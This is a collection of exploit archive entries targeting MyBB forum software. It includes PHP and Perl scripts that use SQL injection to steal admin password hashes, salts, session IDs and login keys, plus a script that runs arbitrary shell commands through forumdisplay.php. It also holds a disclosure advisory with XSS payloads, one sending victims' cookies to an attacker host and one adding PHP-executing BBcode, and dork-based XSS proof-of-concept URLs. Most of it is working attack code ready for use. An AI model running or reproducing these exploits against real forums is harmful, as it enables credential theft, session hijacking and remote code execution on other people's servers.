$send_http .= "Connection: Close\r\n\r\n";
if ($method === 'POST')
{
$send_http .= $data_gp;
}
//print_r($send_http);
fputs($url, $send_http);
while (!feof($url)) $s[] = fgets($url, 1028);
fclose($url);
return $s;
}
echo '<pre>- start....';
myflush(50000);
$get_cookie = sendd($host_mybb, $patch_mybb, $login_mybb, 'POST', $data_login, 'fuckkk');
echo '<pre>- login '.$username.' with passwd = '.$pwd.' done';
myflush(50000);
foreach ($get_cookie as $value)
{
if (strpos($value, 'Set-Cookie: mybbuser=') !== false)
{
$value = explode(";", $value);
$cookie = strstr($value[0], 'mybbuser');
break;
}
}
echo '<pre>- cookie: '.$cookie;
myflush(50000);
preg_match("/mybbuser=(.*)_/", $cookie, $m);
$get_uid = $m[1];
echo '<pre>- user id: '.$get_uid;
myflush(50000);
$data_expl = "to=$username&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),($get_uid,$get_uid,$get_uid,1,'with+<3+from+antichat.ru',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=$uid_needed),(select+password+from+mybb_users+where+uid=$uid_needed),(select+salt+from+mybb_users+where+uid=$uid_needed),' admin sid',(select+sid+from+mybb_adminsessions+where+uid=$uid_needed),' admin loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=$uid_needed)),1121512515,null,null,'yes',null,null)/*&action=do_send";
sendd($host_mybb, $patch_mybb, $pm_mybb, 'POST', $data_expl, $cookie);
echo '<pre>- send exploit:
-------------------
'.$send_http.'
-------------------
look in your private messages for the admin passwd hash <a href=http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.' target=_blank>http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.'</a>';
}
?>
</body>
</html>
MyBulletinBoard (MyBB) versions 1.2.11 and below SQL injection exploit that leverages private.php.
Micheal Cottingham/mybbs142-multi.txt ( na)
======================================================================
Advisory: MyBB 1.4.2 - Multiple Vulnerabilities
Release Date: October 27 2008
Application: MyBB
Version: MyBB 1.4.2
Platform: PHP
Vendor URL: http://www.mybboard.net/
Authors: Kellanved, NeoThermic, Techie-Micheal
=======================================================================
Overview
Due to various failures in sanitising user input, MyBB is vulnerable
to XSS. This is enough to circumvent CSRF protection and to inject
PHP code. We deeply regret having to disclose this, but we were not
able to receive an appropriate response, due to the vendor claiming these
issues are not vulnerabilities when they are and their security tracker
being down.
Therefore, this is being released so that the users of MyBB will be
able to find a patch to keep them safe from these severe issues.
=======================================================================
Discussion
MyBB is a discussion board that has been around for a while; it has
evolved from other bulletin boards into the forum package it is today.
Therefore, it is a professional and efficient discussion board,
developed by an active team of developers.
Due to the misuse/improper validation of the url parameter during an AJAX
request, we were able to cause XSS, contrary to statements made
by the developers of MyBB. This XSS has the ability to cause
Remote Code Execution, making it critical in nature. As XSS can be easily
used to circumvent MyBB's CSRF protection, it is possible to inject PHP
code into the template via the ACP with any of the XSS issues. This is
facilitated by the constant form tokens used in MyBB and by the use of
PHP double-quoted strings as template variables. The former makes it easy
to write escalating exploits, the latter allows PHP injection using the
curly brace notation.
Secondly, it is possible to guess the attachment filenames based
on known factors, making it easy to break IE's poor MIME handling,
including IE8. Given the user ID and post time, uploaded files are easily
"guessed."
Lastly, due to an incomplete fix, MyBB does not properly fix a MIME-
sniffing issue, making it possible to exploit IE6-8.
=======================================================================
Issue 1: XSS using the AJAX switch for redirects
The redirect() function uses an AJAX switch to allow JavaScript redirects
instead of HTTP.
This can be exploited by using single quotes which are not escaped by
htmlspecialchars. This XSS is particularly grave, as it affects moderators
and administrators, allowing attackers to take actions with escalated
privileges, which can result in PHP and SQL injection (see recent vB exploits).
This was not fixed in 1.4.2.
PoC:
http://www.victim.example/mybb/moderation.php?action=removesubscriptions&ajax=1&url='%2Balert('XSS!')//
Cookie Stealing PoC:
http://www.victim.example/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%20%2B%27http://www.attacker.example/cookiejar.php?c=%27%2Bdocument.cookie//
Remote Code Execution PoC:
http://www.victim.example/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%2Beval(%22u%3D%27application%2Fx-www-%27%2B%20%27form-urlencoded%27%22%2B%20String.fromCharCode(59)%20%2B%22c%3D%27Content-type%27%22%2B%20String.fromCharCode(59)%20%2B%22d%3D%27Content-length%27%22%2B%20String.fromCharCode(59)%20%2B%22reg%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22reg.open(%27GET%27%2C%20%27http%3A%2F%2Fwww.victim.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%2C%20false)%22%2B%20String.fromCharCode(59)%20%2B%22reg.send(null)%22%2B%20String.fromCharCode(59)%20%2B%22r%3Dreg.responseText%22%2B%20String.fromCharCode(59)%20%2B%22t%3D%27http%3A%2F%2Fwww.victim.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%22%2B%20String.fromCharCode(59)%20%2B%22t2%3D%27%26replacement%3D%241%26active%3D1%26my_post%22%20%20%20%20%2B%22_key%3D%27%2Br.substr(r.indexOf(%27my_post_%22%20%2B%22key%27%2B%20%27%27)%2B15%2C32)%22%2F*%20%20%20%20%20%20*%2F%2B%22%20%2B%27%26title%3DPwned%26description%27%2B%20%27%3Dfoo%26regex%3D%22%20%20%20%20%20%20%20%2B%22evil(.*)evil%2523e%2500test%27%22%2B%20String.fromCharCode(59)%20%2B%22r2%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22r2.open(%27POST%27%2Ct%2Cfalse)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(d%2Ct2.length)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(c%2Cu)%22%2B%20String.fromCharCode(59)%20%2B%22r2.sendAsBinary(t2)%22%2B%20String.fromCharCode(59))//
All that is required is an active admin session for cookie stealing and
Remote Code Execution.
This adds the BBcode evil and can be used as follows:
evilphpinfo()evil
Note: The %20 padding is necessary and must be custom-tailored to the
victim due to how MyBB handles posting, if using the posting form.
However, CSRF can be used instead of posting directly to the site.
Issue 2: "Guessing" of attachment filenames
On certain server setups running MyBB, it is possible to guess the filename
of an uploaded file. The code in question is this:
$filename = "post_".$mybb->user['uid']."_".time().".attach";
This creates a filename of the form post_1234_[unix timestamp].attach, where
1234 is the uploader's uid. This makes it very easy to guess the filename and
bypass any sort of MIME-sniffing protection. It also means privilege
escalation, as attachments can be read regardless of the user's permissions.
It is not even hard to guess the filename without knowing the post time: just
a few million attempts, due to the weak randomization used.
Issue 3: Incomplete protection against MIME-sniffing.
MyBB fails to properly deliver uploaded files in a way that avoids
MIME-sniffing by the Internet Explorer family of browsers. This can
be exploited to upload files that will be interpreted as HTML by
Internet Explorer. As this vulnerability is present in many applications,
we will not provide a PoC.
None of the reported issues were fixed in the 1.4.2 release or since.
=======================================================================
History
August 18 2008: Vendor contacted
September 02 2008: Vendor contacted again, due to no response
September 03 2008: Vendor announced full source audit to be performed
    by Gulftech
September 17 2008: Patch released, vulnerabilities incorrectly credited
    to Gulftech, two out of three vulnerabilities left exploitable, with
    the XSS and the MIME-sniffing
September 17 2008: After learning about the release from sources other
    than the vendor, FD
September 23/24 2008: Emailed again in an attempt to ensure MyBB
    understood the severity of the MIME-sniffing vulnerability and
    alerting them to the XSS
October 05/06 2008: MyBB replied that the XSS was a non-issue
October 27 2008: Release after MyBB has failed to release a fix after
    numerous attempts to explain the severity of the vulnerabilities,
    Issue 2 was previously unreported
=======================================================================
=======================================================================
Solution
For users: Per usual, update as soon as a patch becomes available.
For MyBB: Give credit to researchers where due.
=======================================================================
Fun quote for the day (and mention of a really good book):
"What we found was startling: Security and coding flaws were so
prevalent that an attack might be delayed because the attacker might
get stuck trying to choose from all the different vulnerabilities to
exploit without knowing where to turn first. (Such delay tactics are
not recommended as a security strategy.)" - Aviel D. Rubin, Exploiting
Software: How to Break Code, Foreword
MyBB version 1.4.2 suffers from cross site scripting and remote code execution vulnerabilities.
Silentz/mybb1210-exec.txt ( na)
#!/usr/bin/php -q -d short_open_tag=on
<?php
// magic_quotes_gpc needs to be off
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
if ($argc<5) {
print "-------------------------------------------------------------------------\r\n";
print " MyBB <= 1.2.10 Remote Code Execution Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "Usage: w4ck1ng_mybb.php [HOST] [PATH] [FORUM_ID] [COMMAND]\r\n\r\n";
print "[HOST] = Target server's hostname or ip address\r\n";
print "[PATH] = Path where MyBB is located\r\n";
print "[FORUM_ID] = Valid forum ID\r\n";
print "[COMMAND] = Command to execute\r\n\r\n";
print "e.g. w4ck1ng_mybb.php victim.com /mybb/ 1 id\r\n";
print "-------------------------------------------------------------------------\r\n";
print " http://www.w4ck1ng.com\r\n";
print " ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
die;
}
//Props to rgod for the following functions
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
$host = $argv[1];
$path = $argv[2];
$fid = $argv[3];
$cmd = $argv[4];
$cmd = urlencode($cmd);
$port=80;$proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$sql = "forumdisplay.php?fid=$fid&sortby=']=1;echo%20'*';%20system('$cmd');echo%20'*';%20\$orderarrow['";
$packet ="GET " . $path . $sql . " HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("*",$html);
$temp2=explode("*",$temp[1]);
print "-------------------------------------------------------------------------\r\n";
print " MyBB <= 1.2.10 Remote Code Execution Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
echo $temp2[0];
print "-------------------------------------------------------------------------\r\n";
print " http://www.w4ck1ng.com\r\n";
print " ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
?>
MyBulletinBoard aka MyBB versions 1.2.10 and below remote code execution exploit.
Darksnipper/MyBB Games Cross Site Scripting ( na)
################################################################
#
# Exploit Title : Mybb Games xss Vul
#
# Author : DarkSnipper, Dream.Killer & Soul~inj3ctor
#
# Discovered By : Darksnipper@live.com
#
# Home : http://cybercoders.org
#
# Link : http://mods.mybb.com/view/game-section
#
# Security Risk : High
#
# Version : All
#
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork : intext:"Powered By mybb"
#
######################################################################
#
# Expl0iT : http://www.site.com/games.php?des=%27%22%3E%3E%3Cscript%3Ealert%28%27+by+Darksnipper%27%29%3C%2Fscript%3E
# or http://www.site.com/scriptlocation/games.php?des=%27%22%3E%3E%3Cscript%3Ealert%28%27+by+Darksnipper%27%29%3C%2Fscript%3E
#
# Demo : http://www.cyberhut.in/games.php?des=%27%22%3E%3E%3Cscript%3Ealert%28%27+by+snipper%27%29%3C%2Fscript%3E
#
# Greetz : Error Haxor, Dream.killer, Soul~Inj3ctor, Dr.v!ru$, Shadow008, H4x0rl1f3, X3o-1337, Force-ex, Retn0Hack, P4k-comm4nder, 1337, Madcode, Anons Dexter, Sen Haxor, Dr.z0mbie, Trick, Pak Cyber Army, Madleets, Z Company Hacking Crew, Badwares Team, Kashmir Cyber Army, Anonymous Pakistan, 3xp1r3 Cyber Army And All Muslim Hackers.
################################
MyBB Games suffers from a cross site scripting vulnerability.
TEAMELITE/MyBB Cross Site Scripting ( na)
MyBB all version (tags.php?tag=) - Cross-Site Scripting (XSS) & HTML Injection
http://www.mybb.com
12-12-2010
Poc: http://infectionsupport.com/tags.php?tag="><script>alert(String.fromCharCode(88,83,83))</script>
http://infectionsupport.com/tags.php?tag="><script src%3d//ckers.org/s></script>
Google dork: powered by mybb inurl:tags.php?tag=
by Teamelite (Methodman) http://nemesis.te-home.net
MyBB suffers from a cross site scripting vulnerability in tags.php.
D3vil-0x1/MyBB104SQL.txt ( na)
#!/usr/bin/perl -w
# MyBB <= 1.04 (misc.php COMMA) Remote SQL Injection Exploit 2 , Perl C0d3
#
# Milw0rm ID :-
# http://www.milw0rm.com/auth.php?id=1539
# D3vil-0x1 | Devil-00 < BlackHat > :)
#
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
use IO::Socket;
##-- Start --#
$host = "127.0.0.1";
$path = "/mybb3/";
$userid = 1;
$mycookie = "mybbuser=1_xommhw5h9kZZGSFUppacVfacykK1gnd84PLehjlhTGC1ZiQkXr;";
##-- _END_ --##
# $host :-
# The host name without http:// | e.g. www.vic.com
#
# $path :-
# MyBB dir on the server | e.g. /mybb/
#
# $userid :-
# The ID of the user whose loginkey you want to get
#
# $mycookie :-
# You must register a username and get your cookie ( mybbuser ), then put it like this:
#
# $mycookie = "mybbuser=[YourID]_[YourLoginkey];";
$sock = IO::Socket::INET->new (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp"
) or die("[!] Connect To Server Failed");
##-- DONT TRY TO EDIT ME --##
$evilcookie = "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=$userid/*;";
##-- DONT TRY TO EDIT ME --##
$evildata = "GET ".$path."misc.php?action=buddypopup HTTP/1.1\n";
$evildata .= "Host: $host \n";
$evildata .= "Accept: */* \n";
$evildata .= "Keep-Alive: 300\n";
$evildata .= "Connection: keep-alive \n";
$evildata .= "Cookie: ".$mycookie." ".$evilcookie."\n\n";
print $sock $evildata;
while($ans = <$sock>){
$ans =~ m/<a href=\"member.php\?action=profile&uid=1\" target=\"_blank\">(.*?)<\/a><\/span><\/td>/ && print "[+] Loginkey is :- ".$1."\n";
}
MyBB versions 1.04 and below remote SQL injection exploit using misc.php.